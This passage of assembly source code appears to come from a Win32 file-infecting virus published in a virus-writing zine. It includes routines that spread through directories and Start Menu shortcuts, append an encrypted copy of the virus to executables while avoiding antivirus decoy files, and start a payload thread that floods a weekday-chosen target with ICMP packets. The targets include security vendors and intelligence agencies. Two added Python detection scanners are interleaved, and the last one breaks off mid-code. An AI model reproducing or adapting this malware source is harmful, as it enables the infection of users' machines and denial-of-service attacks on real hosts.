; ***************************************************************************

InitParsing:

mov [ebp+InfCounter], 30d ; let's parse some directories for
; 30 more files !

lea edi, [ebp+RootDir]


call dword ptr [ebp+XSetCurrentDirectoryA]
call ParseFolder
; if we are not able to access the registry we
; infect another 20 Files in the System-Directory

cmp dword ptr [ebp+XRegOpenKeyExA], 0h


je InfectWinDirAgain
call GetStartMenue ; last but not least, we try to parse the
; start-menu folder ( follow the LNK's )
; to get 20 more files
; with some luck, we infect 100 files each run
; all over the HD *g*
; I think this can be called successful spreading *g*
lea edi, [ebp+windir]
call dword ptr [ebp+XSetCurrentDirectoryA]

InfectWinDirAgain:
mov [ebp+InfCounter], 20d
call ParseFolder ; let's parse the startmenue and follow all
; LNK-Files inside ;)

jmp PayLoad ; start the evil part of this thingie ..

ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0
jbe EndParsing ; we infected enough ? ok, leave !

lea esi, [ebp+Folders]


Call FindFirstFileProc
inc eax
jz EndParsing ; If there are no directories we return
dec eax ; otherwise we save the handle

GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one

lea esi, [ebp+WFD_szFileName]


cmp byte ptr [esi], '.' ; we will not parse into . or ..
je NoThisOne ; directories

push 03h
pop ecx
call GetRand

dec edx ; if division-rest (edx) = 1


jz ParseNewDir ; we get this directory

NoThisOne:

call FindNextFileProc

test eax, eax


jnz GetOtherDir

EndParseDir2: ; we close the search - Handle

mov eax, dword ptr [ebp+FindHandle]


push eax
call dword ptr [ebp+XFindClose]
EndParsing: ; we just return
ret

ParseNewDir: ; we got a directory, let's change to it
; and infect it.. *eg*
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]

lea esi, [ebp+WFD_szFileName]


push esi
call dword ptr [ebp+XSetCurrentDirectoryA]

jmp ParseFolder

; ***************************************************************************
; -----------------[ Let's get the Start menu folder ]-----------------------
; ***************************************************************************

GetStartMenue: ; Let's try to open HKEY_USERS registry Key

lea esi, [ebp+RegHandle]


push esi
push 001F0000h ; complete access
push 0h ; reserved
lea esi, [ebp+SubKey]
push esi
push 80000003h ; HKEY_USERS
call dword ptr [ebp+XRegOpenKeyExA]

test eax, eax ; if we failed opening the key, we return


jnz NoStartMenue

; let's get the value


lea esi, [ebp+BufferSize]
push esi
lea esi, [ebp+windir]
push esi
lea esi, [ebp+ValueType]
push esi ; Type of Value
push 0 ; reserved
lea esi, [ebp+Value]
push esi ; ValueName
mov eax, [ebp+RegHandle]
push eax ; Reg-Key Handle
call dword ptr [ebp+XRegQueryValueExA]

mov eax, dword ptr [ebp+RegHandle]


push eax
call dword ptr [ebp+XRegCloseKey]

NoStartMenue:

ret

SubKey db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0


Value db 'Start Menu',0
ValueType dd 0h ; Type of registry Value
BufferSize dd 7Fh ; size of buffer
; ***************************************************************************
; ----------------[ API - Tables and some other data ]-----------------------
; ***************************************************************************

; Misc Data .. ;)
Folders db '*.',0 ; search for directories
RootDir db 'C:\',0 ; we want to start parsing at root of Drive C:

; Here follow the tables of the api's we use


; for our virus, if you want to know what they
; do exactly simply check the Win32
; Programmer's Reference
; I won't explain them ( I think the names of them
; makes it clear enough *g* )

Kernel32Names: ; 17d API's we want from Kernel32.dll

NumberOfKernel32APIS equ 17d

db 'FindFirstFileA', 0
db 'FindNextFileA', 0
db 'FindClose', 0
db 'CreateFileA', 0
db 'SetFileAttributesA', 0
db 'CloseHandle', 0
db 'CreateFileMappingA', 0
db 'MapViewOfFile', 0
db 'UnmapViewOfFile', 0
db 'GetWindowsDirectoryA', 0
db 'GetSystemDirectoryA', 0
db 'GetCurrentDirectoryA', 0
db 'SetCurrentDirectoryA', 0
db 'GetFileAttributesA', 0
db 'GetTickCount', 0
db 'CreateThread',0
db 'GetSystemTime',0

ImageHLPNames:
db 'CheckSumMappedFile', 0h

ADVAPI32Names:
db 'RegOpenKeyExA',0
db 'RegQueryValueExA',0
db 'RegCloseKey',0

WSOCK32Names:
db 'socket',0
db 'WSACleanup',0
db 'WSAStartup',0
db 'closesocket',0
db 'sendto',0
db 'setsockopt',0

; ***************************************************************************
; --------------[ Retrieve API's with GetProcAddress ]-----------------------
; ***************************************************************************

; esi points to the Table of Names


; edi to the offsets
; ebx contains the module-handle
; ecx the number of API's
GetAPI3:
push ecx ; save ecx
push esi ; push api-name
push ebx ; Push Module-Handle
; call GetProcAddress

call dword ptr [ebp+XGetProcAddress]


stosd ; store api-offset

pop ecx ; did we get them all ?


dec ecx
jz EndApi3 ; if yes then return

push ecx ; otherwise move esi to next API-Name

SearchZero: ; we search for the end of the current


cmp byte ptr [esi], 0h
je GotZero ; api name ( always 0h ) and increase
inc esi
jmp SearchZero

GotZero:
inc esi
pop ecx ; get ecx ( counter )

jmp GetAPI3 ; retrieve Next API

EndApi3:
ret

; ***************************************************************************
; --------------[ Search Kernel Export Table for API's ]---------------------
; ***************************************************************************

SearchAPI1: ; In this procedure we search for the first 2 API's

; clear the counter
and word ptr [ebp+counter], 0h

mov eax, [ebp+KernelAddy] ; Load the PE-Header Offset
mov esi, [eax+78h] ; Get Export Table Address
add esi, [ebp+MZAddy] ; normalize RVA
add esi, 1Ch ; skip not needed data
; now we have the Address Table RVA-Offset in esi

lodsd ; Get Address Table RVA


add eax, [ebp+MZAddy] ; convert to VA and save it
mov dword ptr [ebp+ATableVA], eax

lodsd ; Get Name Pointer Table RVA


add eax, [ebp+MZAddy] ; make it VA and save it
mov dword ptr [ebp+NTableVA], eax

lodsd ; Get Ordinal Table RVA


add eax, [ebp+MZAddy] ; guess what ? *g*
mov dword ptr [ebp+OTableVA], eax

mov esi, [ebp+NTableVA] ; Get the Name Pointer Table Addy in esi

SearchNextApi1:
push esi ; Save Pointer Table
lodsd
add eax, [ebp+MZAddy] ; make it VA

mov esi, eax ; API Name in the Kernel Export Table
mov edi, edx ; API we are looking for
push ecx ; save the size

cld ; Clear direction Flag


rep cmpsb ; Compare it
pop ecx
jz FoundApi1 ; Are they equal ?

pop esi ; Get the Pointer Table


add esi, 4h ; Set Pointer to the next api
inc word ptr [ebp+counter]
cmp word ptr [ebp+counter], 2000h
je NotFoundApi1
jmp SearchNextApi1 ; test next API

FoundApi1:
pop esi ; clear stack ( we don't want buffer overflows
; ok, we want them, but not here *bg* )

movzx eax, word ptr [ebp+counter]


shl eax, 1h ; multiply eax with 2
; Make eax Point to the right entry inside the
; Ordinal Table
add eax, dword ptr [ebp+OTableVA]
xor esi, esi ; clear esi
xchg eax, esi ; make esi point to the entry
lodsw ; get Ordinal in AX
shl eax, 2h ; eax * 4
add eax, dword ptr [ebp+ATableVA]
mov esi, eax ; esi points to the address RVA
lodsd ; eax = address RVA
add eax, [ebp+MZAddy] ; Make it VA

ret ; Return with API-Addy in eax

NotFoundApi1:
xor eax, eax ; We didn't find the API we need :(
ret ; We set EAX to 0 to show we have to
; return to the host..

; ***************************************************************************
; -------------------[ Execute the original Program ]------------------------
; ***************************************************************************

ExecuteHost: ; Here we execute the original program

lea edi, [ebp+curdir] ; we return to the original directory..
push edi
call dword ptr [ebp+XSetCurrentDirectoryA]

or ebp, ebp ; if this is a virus of the first generation
jz FirstGenHost ; we can't return to a host, so we
; stop this with ExitProcess..
Error_ExecuteHost:
mov eax, dword ptr [ebp+SEH_Save]
push eax
mov fs:[0], esp
mov eax,12345678h ; here we return to
org $-4 ; the old entry point
retEIP dd 0h ; of the infected file

add eax,12345678h
org $-4
retBas dd 0h

jmp eax

FirstGenHost:
push 0h ; Stop executing this stuff ( first Generation
call ExitProcess ; only )

OldEIP dd 0h ; Old Entry Point


OldBase dd 0h ; Old Imagebase

NewEIP dd 0h ; New Entry Point ( points to our virus.. )

; ***************************************************************************
; ----------------[ We try to find the Kernel Address ]----------------------
; ***************************************************************************

GetKernel: ; Here we try to retrieve the Kernel

; set search range
mov byte ptr [ebp+K32Trys], 5h

GK1:
cmp byte ptr [ebp+K32Trys], 00h
jz NoKernel ; Did we pass our limit of K32Trys steps ( 10000h bytes each ) ?

call CheckMZSign ; Has this Page a DOS EXE-Header ?


jnc CheckPE

GK2:
sub esi, 10000h ; Get the next page
dec byte ptr [ebp+K32Trys]
jmp GK1 ; Check it

CheckPE: ; Let's check if we really found


mov edi, [esi+3Ch] ; the Kernel32.dll PE-Header
add edi, esi
call CheckPESign ; check for PE-Sign

jnc CheckDLL ; check for the DLL-Flag


jmp GK2

CheckDLL:
add edi, 16h ; check for the Dll-Flag
mov bx, word ptr [edi] ; get characteristics
and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
jne GK2 ; if it is no dll go on searching

KernelFound: ; we found the Kernel32.dll


sub edi, 16h ; set edi to the PE - Header
xchg eax, edi ; save PE address in eax
xchg ebx, esi ; save MZ address in ebx
cld
ret

NoKernel: ; if not found we set the carry flag
stc
ret ; return if not found

K32Trys db 5h ; Search-Range

; ***************************************************************************
; -----------------[ Infection of the current directory ]--------------------
; ***************************************************************************

InfectCurDir: ; Here we infect the files in the current directory
; we use the FindFirstFile - FindNextFile API's
; to scan all files for PE-Executables and
; LNK-Files.
lea esi, [ebp+filemask]
call FindFirstFileProc

inc eax
jz EndInfectCurDir1 ; If there are no files, we return
dec eax

InfectCurDirFile:
; filename in esi
lea esi, [ebp+WFD_szFileName]
call InfectFile ; Try to infect it !

cmp [ebp+InfCounter], 0h ; if we infected enough files


jna EndInfectCurDir2 ; we return

call FindNextFileProc

test eax, eax


jnz InfectCurDirFile

EndInfectCurDir2: ; we close the search - Handle

push dword ptr [ebp+FindHandle]


call dword ptr [ebp+XFindClose]

EndInfectCurDir1: ; we just return


ret

InfCounter db 0h ; Counter for the number of files we infect
; at max in the current directory
; ( could take too long if we want to infect them
; all )

FindHandle dd 0h ; The handle for the FindFirstFile API

filemask db '*.*', 0 ; we search for all files, not just exe files

; these structures are necessary
; for the FindFileFirst - FindFileNext API's

; ***************************************************************************
; ---------------------[ Prepare infection of file ]------------------------
; ***************************************************************************
InfectFile: ; Here we prepare to infect the file
; the filename is in [ebp+WFD_szFileName]
; we open it and check if it is something
; we are able to infect...
; esi points to the filename..

cmp byte ptr [esi], '.' ; check if we got .. or .
je NoInfection
; if the file is smaller than
; 200 Bytes it will not get checked or
; infected !

cmp dword ptr [ebp+WFD_nFileSizeLow], 200d


jbe NoInfection
; we also don't infect it if it is too big
cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
jne NoInfection

call CheckFileName ; check for AV-Files


jc NoInfection

; Get File-Attributes
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XGetFileAttributesA]
; save them
mov dword ptr [ebp+Attributes], eax

inc eax
jz NoInfection ; if we failed we don't infect
dec eax

push 80h ; clean attributes


lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XSetFileAttributesA]
or eax, eax ; if we fail, we don't open the file
jz NoInfection ; if we have no access to set the attributes,
; we will surely not be allowed to change the file itself

call OpenFile ; open the file


jc NoInfection ; if we failed we don't infect..

mov esi, eax


call CheckMZSign ; if it is an EXE file, we go on
jc CheckLNK ; otherwise we test if it is a LNK

cmp word ptr [eax+3Ch], 0h


je CheckLNK

xor esi, esi ; get the start of the PE-Header


mov esi, [eax+3Ch]
; if it lies outside the file we skip it
cmp dword ptr [ebp+WFD_nFileSizeLow], esi
jb Notagoodfile

add esi, eax

mov edi, esi


call CheckPESign ; check if it is an PE-Executable
jc Notagoodfile
; check infection mark --> DDoS
; if it is there the file is already infected..

cmp dword ptr [esi+4Ch], 'SoDD'


jz Notagoodfile

mov bx, word ptr [esi+16h]; get characteristics


and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
je Notagoodfile ; we will not infect dll-files

mov bx, word ptr [esi+16h]; get characteristics again


and bx, 00002h ; we check if it is no OBJ or something else..
cmp bx, 00002h
jne Notagoodfile

call InfectEXE ; ok, infect it !


; if an error occurred
; while mapping the file again,
; we don't need to unmap & close it
jc NoInfection
jmp Notagoodfile

CheckLNK: ; check if we got an LNK-File


mov esi, dword ptr [ebp+MapAddress]
cmp word ptr [esi], 'L' ; check for sign
jne UnMapFile ; if it is no LNK File we close it

call InfectLNK

Notagoodfile:
call UnMapFile ; we store the file..
; we restore the file-attributes

push dword ptr [ebp+Attributes]


lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XSetFileAttributesA]

NoInfection:
ret

; ***************************************************************************
; ------------------------[ Open and close Files ]---------------------------
; ***************************************************************************

OpenFile:

xor eax,eax ; let's open the file


push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi ; name of file
call dword ptr [ebp+XCreateFileA]

inc eax
jz Closed ; if there is an error we don't infect the file
dec eax ; now the handle is in eax
; we save it
mov dword ptr [ebp+FileHandle],eax

; if we map a file normally, we map it with the size
; in the Find32-Data
; otherwise it is in ecx
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]

CreateMap:
push ecx ; save the size

xor eax,eax ; we create a map of the file to


push eax ; be able to edit it
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+XCreateFileMappingA]

mov dword ptr [ebp+MapHandle],eax

pop ecx ; get the size again..


test eax, eax ; if there is an error we close the file
jz CloseFile ; no infection today :(

xor eax,eax ; we map the file.. *bla*


push ecx
push eax
push eax
push 2h
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XMapViewOfFile]

or eax,eax ; if there is an error, we unmap it


jz UnMapFile
; eax contains the offset where
; our file is mapped.. *g*

mov dword ptr [ebp+MapAddress],eax


; Clear c-flag for successful opening
clc

ret ; we successfully opened it !

UnMapFile: ; ok, unmap it

call UnMapFile2

CloseFile: ; let's close it

push dword ptr [ebp+FileHandle]


call [ebp+XCloseHandle]

Closed:
stc ; set carry flag

ret

UnMapFile2: ; we need to unmap it some times, to
; map it again with more space..

push dword ptr [ebp+MapAddress]


call dword ptr [ebp+XUnmapViewOfFile]

push dword ptr [ebp+MapHandle]


call dword ptr [ebp+XCloseHandle]

ret

; ***************************************************************************
; -------------------------[ Infect an EXE-FILE ]----------------------------
; ***************************************************************************

InfectEXE: ; MapAddress contains the starting offset of the file
; we will not infect exe files, which are smaller than
; 40 Kb, this is for avoiding goat files.
; AV's use them to study viruses !

cmp dword ptr [ebp+WFD_nFileSizeLow] , 0A000h


jb NoEXE

mov ecx, [esi+3Ch] ; esi points to the PE-Header


; ecx contains file-alignment
; put size in eax

mov eax, dword ptr [ebp+WFD_nFileSizeLow]


add eax, dword ptr [ebp+VirLen]

call Align ; align it and save the new size


mov dword ptr [ebp+NewSize], eax
xchg ecx, eax

pushad ; save registers


; we close the file and map it again,
; but this time we will load it
; with some more space, so we can add
; our code *eg*
call UnMapFile2
popad

call CreateMap ; we map it again with a bigger size


; if we got an error we return
jc NoEXE
; make esi point to the PE-Header again
; get offset
mov esi, dword ptr [eax+3Ch]
; make it VA
add esi, eax
mov edi, esi ; edi = esi
; eax = number of sections
movzx eax, word ptr [edi+06h]
dec eax
imul eax, eax, 28h ; multiply with size of section header
add esi, eax ; make it VA
add esi, 78h ; make it point to dir table
; esi points now to the dir-table

mov edx, [edi+74h] ; get number of dir - entries
shl edx, 3h ; multiply with 8
add esi, edx ; make it point to the last section

; get the Entry Point and save it


; we need it to be able to return
; to the original file

mov eax, [edi+28h]


mov dword ptr [ebp+OldEIP], eax

; get the imagebase, also needed to


; execute original file
mov eax, [edi+34h]
mov dword ptr [ebp+OldBase], eax

mov edx, [esi+10h] ; size of raw data


; we will increase it later
mov ebx, edx
add edx, [esi+14h] ; edx = Pointer to raw-data

push edx ; save it in stack

mov eax, ebx


add eax, [esi+0Ch] ; make it VA
; this is our new EIP

mov [edi+28h], eax


mov dword ptr [ebp+NewEIP], eax

mov eax, [esi+10h] ; get size of Raw-data


push eax
add eax, dword ptr [ebp+VirLen]
; increase it
mov ecx, [edi+3Ch] ; Align it

call Align

; save it in the file as


; new size of rawdata and
mov [esi+10h], eax

pop eax ; new Virtual size


add eax, dword ptr [ebp+VirLen]
add eax, Buffersize
mov [esi+08h], eax

pop edx

mov eax, [esi+10h]


add eax, [esi+0Ch] ; New Size of Image
; save it in the file
mov [edi+50h], eax
; change section flags to make
; us have write & read access to it
; when the infected file is run
; we also set the code flag.. ;)
or dword ptr [esi+24h], 0A0000020h
; we write our infection mark to the program,
; so we will not infect it twice
; --> DDoS
mov dword ptr [edi+4Ch], 'SoDD'
push edi ; save them
push edx

push 10d
pop ecx
call GetRand ; get random number ( we'll use the EAX value )
pop edi ; restore and exchange
pop edx

mov word ptr [ebp+Key], ax


push eax ; save it 2 times

lea esi, [ebp+Virus] ; point to start of virus


add edi, dword ptr [ebp+MapAddress]
push edi ; save edi

mov ecx, dword ptr [ebp+VirLen]


; get size of virus in ecx
rep movsb ; append virus !

pop esi ; decrypt the virus


mov edi, esi
add esi, NoCrypt
mov ecx, (CryptSize / 2)

pop edx ; get key from stack


push edi ; save start
mov edi, esi

EnCryptLoop: ; encrypt the appended copy with the second layer


lodsw
not ax
inc dx
xchg dl, dh
xor ax, dx
xchg al, ah
stosw
loop EnCryptLoop

pop esi ; now the first layer: the cipher the poly decryptor undoes
add esi, 05h ; skip the call
mov ecx, FirstLSize ; mov size to ecx
mov edi, esi
mov edx, dword ptr [ebp+CryptType]
xor eax, eax

XorEncrypt: ; we use a simple xor


dec edx
jnz NegEncrypt
mov dl, byte ptr [ebp+PolyKey]

@Xor:
lodsb
xor al, dl
stosb
loop @Xor
jmp EndPolyCrypto

NegEncrypt:
dec edx
jnz NotEncrypt
@Neg:
lodsb
neg al
stosb
loop @Neg
jmp End2LCrypto
NotEncrypt: ; not byte ptr [esi]
dec edx
jnz IncEncrypt
@Not:
lodsb
not al
stosb
loop @Not
jmp End2LCrypto

IncEncrypt: ; inc byte ptr [esi]


dec edx
jnz DecEncrypt
@Inc:
lodsb
dec al
stosb
loop @Inc
jmp End2LCrypto

DecEncrypt: ; dec byte ptr [esi]


lodsb
inc al
stosb
loop DecEncrypt

End2LCrypto:

dec byte ptr [ebp+InfCounter]

; if we successfully received the dll and the
; function, we create a checksum for the
; file ( needed for dll's and WinNT )
cmp [ebp+XCheckSumMappedFile], 0h
je NoCRC

lea esi, [ebp+CheckSum]


push esi
lea esi, [ebp+HeaderSum]
push esi
push dword ptr [ebp+NewSize]
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XCheckSumMappedFile]

test eax, eax ; if this failed we don't save


jz NoCRC ; the crc

mov eax, dword ptr [ebp+MapAddress]


; eax points to the dos-stub
mov esi, [eax+3Ch] ; esi points to PE-Header
add esi, eax ; save CRC in header

mov eax, dword ptr [ebp+CheckSum]


mov [esi+58h], eax

NoCRC:
ret
NoEXE: ; let's return and close the infected file
; this will also write it to disk !
stc
ret
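
Added example, not part of SnakeByte's source or this zine: a Python scanner for the traces InfectEXE leaves behind, the "DDoS" mark at PE+4Ch (Win32VersionValue), an entry point inside the last section, and the 0A0000020h flags ORed into that section's header. The sample images are constructed inline; their section sizes and the VirLen growth are assumed values.

```python
import struct
from typing import Optional

# Infection mark written by InfectEXE: the dword 'SoDD' lands in the file as "DDoS"
INFECTION_MARK = b"DDoS"
# Flags InfectEXE ORs into the last section header (+24h): write | execute | code
VIRUS_SECTION_FLAGS = 0xA0000020


def scan_pe(data: bytes) -> Optional[dict]:
    """Check a PE image for the infector's traces using the same header offsets
    the assembly walks (e_lfanew at 3Ch, section table at PE+78h + 8*dirs).
    Returns None for anything that is not a parseable PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if pe + 0x78 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return None
    nsec = struct.unpack_from("<H", data, pe + 0x06)[0]      # NumberOfSections
    entry = struct.unpack_from("<I", data, pe + 0x28)[0]     # AddressOfEntryPoint
    ndirs = struct.unpack_from("<I", data, pe + 0x74)[0]     # NumberOfRvaAndSizes
    last = pe + 0x78 + 8 * ndirs + 0x28 * (nsec - 1)         # last section header
    if nsec == 0 or last + 0x28 > len(data):
        return None
    vsize, va, rawsize = struct.unpack_from("<III", data, last + 0x08)
    chars = struct.unpack_from("<I", data, last + 0x24)[0]
    mark = data[pe + 0x4C:pe + 0x50] == INFECTION_MARK       # Win32VersionValue
    ep_in_last = va <= entry < va + max(vsize, rawsize)
    rwx = (chars & VIRUS_SECTION_FLAGS) == VIRUS_SECTION_FLAGS
    return {
        "mark": mark,
        "ep_in_last_section": ep_in_last,
        "last_section_rwx": rwx,
        "infected": mark,                   # the virus's own re-infection test
        "suspicious": ep_in_last and rwx,   # generic appending-infector heuristic
    }


def build_sample_pe(infected: bool) -> bytes:
    """Constructed test data (not a real binary): a minimal two-section PE32
    header. With infected=True the last section looks the way InfectEXE leaves
    it: entry point at the end of its old raw data, flags ORed in, sizes grown
    (assumed VirLen), and the mark written at PE+4Ch."""
    img = bytearray(0x200)
    img[0:2] = b"MZ"
    pe = 0x40
    struct.pack_into("<I", img, 0x3C, pe)                    # e_lfanew
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, pe + 0x04, 0x014C, 2)       # i386, 2 sections
    struct.pack_into("<HH", img, pe + 0x14, 0xE0, 0x0102)    # opt hdr size, EXE|32bit
    opt = pe + 0x18
    struct.pack_into("<H", img, opt, 0x10B)                  # PE32 magic
    struct.pack_into("<I", img, opt + 0x1C, 0x00400000)      # ImageBase (PE+34h)
    struct.pack_into("<II", img, opt + 0x20, 0x1000, 0x200)  # section / file alignment
    struct.pack_into("<I", img, opt + 0x5C, 16)              # NumberOfRvaAndSizes
    sec = opt + 0xE0                                         # section table (PE+F8h)
    struct.pack_into("<8sIIII", img, sec, b".text", 0x400, 0x1000, 0x400, 0x200)
    struct.pack_into("<I", img, sec + 0x24, 0x60000020)
    if infected:
        vsize, rawsize = 0x1300, 0x1200                      # grown by assumed VirLen
        chars = 0xC0000040 | VIRUS_SECTION_FLAGS
        entry = 0x2000 + 0x200                               # old SizeOfRawData + VA
        img[pe + 0x4C:pe + 0x50] = INFECTION_MARK
    else:
        vsize, rawsize, chars, entry = 0x200, 0x200, 0xC0000040, 0x1000
    struct.pack_into("<8sIIII", img, sec + 0x28, b".data", vsize, 0x2000, rawsize, 0x600)
    struct.pack_into("<I", img, sec + 0x28 + 0x24, chars)
    struct.pack_into("<I", img, opt + 0x10, entry)           # AddressOfEntryPoint
    return bytes(img)


if __name__ == "__main__":
    for flag in (False, True):
        print("infected=%s -> %s" % (flag, scan_pe(build_sample_pe(flag))))
```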
; ***************************************************************************
; ------------------------[ Infect an LNK-FILE ]-----------------------------
; ***************************************************************************

InfectLNK: ; if we find a link file, we try to find the


; file it points to. If it is a EXE File we are able
; to infect, we do so
; this will not work with NT-LNK-Files, there we will
; receive only the Drive, where the file is located

; ok, if a LNK is bigger than 1 KB ( 0400h bytes ), it is none
; we check .. ;)
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h
ja NoLNK

; get the start addy in esi, and and the size


mov esi, dword ptr [ebp+MapAddress]
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
xor edx, edx
add esi, ecx ; we start checking at the end of the file
; for a valid filename in it
CheckLoop:
cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : )
jne LNKSearch ; in the Drive

inc edx ; there are 2 times 2 dots, when checking from


cmp edx, 2d ; the end of the LNK, we need the 2.nd
je PointsDetected

LNKSearch: ; go on searching
dec esi
loop CheckLoop
; if we end here, we did not find the two dots.. :(
NoLNK:

ret

PointsDetected: ; we found the drive ( two dots ... *g* )


; esi points to them, now we need to check
; for the start of the name..

cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a


je NoLNK ; single drive ( may happen in NT / 2k )

PointsDetected2:
dec esi
cmp byte ptr [esi], 0h
je NameDetected

loop PointsDetected2 ; ecx still takes care, that we don't


; search too far..
jmp NoLNK ; nothing found ? return..

NameDetected: ; ok, esi points now to the name of the file


; so we try a FindFileFirst to get the information
; first, we save the information in the WIN32_FIND_DATA
; then we try to find the file.
inc esi
push esi ; save it

lea esi, [ebp+WIN32_FIND_DATA]


lea edi, [ebp+Buffer] ; save the old WIN32_FIND_DATA
mov ecx, 337d ; and some more data
rep movsb

lea edi, [ebp+WIN32_FIND_DATA]


xor eax, eax ; clean this field
mov ecx, 337d
rep stosb

pop esi

call FindFirstFileProc

inc eax
jz RestoreLNK ; If there are no files, we return
dec eax
; otherwise we save the handle

; if we went here, we know the file exists


; esi still points to the filename including the
; directory, we save this in the win32_Find_DATA
; field, because the name there contains no path

lea edi, [ebp+WFD_szFileName]


mov ecx, 259d ; we just move 259 Bytes, so there is still an ending
; Zero if the name is longer and we just get a simple error
; and not an SEH or some other shit
rep movsb
lea esi, [ebp+WFD_szFileName]
call InfectFile ; esi points to the filename again, so we infect it ;)

push dword ptr [ebp+LNKFindHandle]


call dword ptr [ebp+XFindClose]

RestoreLNK:
lea edi, [ebp+WIN32_FIND_DATA]
lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA
mov ecx, 337d ; and some other data
rep movsb

ret ; return to find more files

LNKFindHandle dd 0h ; here we save the search-handle

; ***************************************************************************
; ---------------------[ The evil Part: the Payload ]------------------------
; ***************************************************************************

PayLoad: ; here we handle the payload of the virus *eg*

cmp dword ptr [ebp+W32Handle],0


jne ExecuteHost

cmp dword ptr [ebp+XCreateThread],0


je ExecuteHost ; we better check this, cause this api does not exist in 2k

lea eax, [ebp+SystemTime] ; retrieve current date, time,.. whatever


push eax
call dword ptr [ebp+XGetSystemTime]
lea esi, [ebp+wDayOfWeek] ; get the day
xor eax, eax
lodsw

shl eax, 2h ; multiply with 4


; get Target
lea esi, [ebp+TargetTable]
add esi, eax
lea edi, [ebp+Target_IP] ; write IP to Destination Address Field
movsd
; we get a nice target for the payload
; and create a new thread to fulfill it ;)

push offset threadID ; here we save the thread ID


push 0h
push 0h
push offset PingFlood ; here starts the code of the new thread
push 0h
push 0h
call dword ptr [ebp+XCreateThread]

jmp ExecuteHost ; we're finished, so we execute the host-file

PingFlood: ; this is the thread of the payload !


; here are we doing the really evil thingies ;)
; we will start pinging a server ;P

lea eax, [ebp+offset WSA_DATA]


push eax ; where is it..
push 0101h ; required version
call dword ptr [ebp+XWSAStartup]

push 1 ; We want to use the ICMP protocol ( IPPROTO_ICMP )
push 3 ; SOCK_RAW
push 2 ; Address Format ( AF_INET )
call dword ptr [ebp+Xsocket]

mov dword ptr [ebp+ICMP_Handle], eax

push 4 ; set the options ( timeout, not really
; necessary in this case *g* )
lea eax, [ebp+offset Timeout]
push eax
push 1006h
push 0FFFFh
push eax
call dword ptr [ebp+Xsetsockopt]

; we need to create a checksum for the packet


lea esi, [ebp+ICMP_Packet]; nothing serious just some additions

push 6 ; we do this for 6 words


pop ecx ; = 12 bytes
xor edx, edx

CreateICMP_CRC: ; load one


lodsw
movzx eax, ax ; mov it to eax ( clean upper part of eax )
add edx, eax ; add it to edx ( we just add them all )
loop CreateICMP_CRC

movzx eax, dx ; add the lower ( dx ) and the upper part of


shr edx, 16d ; edx together in eax
add eax, edx

movzx edx, ax ; save ax in edx


shr eax, 16d ; mov upper part of eax to ax ( clean upper part )
add eax, edx ; add old ax to new ax ( add upper part to lower part )

not eax ; eax = - 1 * ( eax + 1 )


; this is our checksum
mov word ptr [ebp+ICMP_CRC], ax

push 16d ; get it out, we send our packet !


lea eax, [ebp+offset Info]
push eax
push 0
push 12d
lea eax, [ebp+offset ICMP_Packet]
push eax
push dword ptr [ebp+ICMP_Handle]
call dword ptr [ebp+Xsendto]

CloseSocket: ; close the socket, to stay stable ;)


push dword ptr [ebp+ICMP_Handle]
call dword ptr [ebp+Xclosesocket]
call dword ptr [ebp+XWSACleanup]

jmp PingFlood ; heh that was fun, let's do it again ;)

Timeout dd 100000d ; 100000 ms Timeout ( we don't really care about it *g* )


Info:
dw 2h
dw 0h
Target_IP db 0d, 0d, 0d, 0d
dd 0h ; there we will fill in the target ip address ;)
ICMP_Packet db 8h
db 0h
ICMP_CRC dw 0h ; for the CRC Calculation of the ping
dd 0h
dd 0h
dd 0h
ICMP_Handle dd 0h ; the handle of the open Socket

TargetTable: ; these are our targets
; please note again, that I don't want to damage one
; of these servers ! I chose them because I think that
; they will stand such an attack if anyone will ever release this
; into the wild !!!

db 62d, 156d, 146d, 231d ; Sunday = www.bundesnachrichtendienst.de


db 195d, 154d, 220d, 34d ; Monday = French Secret Service ( dgse.citeweb.net )
db 216d, 122d, 8d, 245d ; Tuesday = www.avp.com ( AV )
db 216d, 41d, 20d, 75d ; Wednesday = www.lockdown2000.com
db 194d, 252d, 6d, 47d ; Thursday = www.f-secure.com
db 208d, 226d, 167d, 23d ; Friday = www.norton.com
db 205d, 178d, 21d, 3d ; Saturday = www.zonelabs.com
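
Added example, not from the zine: Python detection logic for the payload's ICMP message. It verifies the RFC 1071 one's complement checksum that CreateICMP_CRC computes, matches the fixed 12-byte echo request PingFlood emits, and counts hits per source/destination pair. The sample datagrams and the log addresses are constructed (documentation ranges, not the target table above).

```python
import struct
from collections import Counter
from typing import Dict, Iterable, Tuple


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 one's complement sum over 16-bit words, folded to 16 bits.
    This is what the CreateICMP_CRC loop computes; reading the words
    little-endian as the assembly does gives the same stored bytes."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def icmp_checksum_valid(pkt: bytes) -> bool:
    """A received ICMP message is intact when the sum over the whole message,
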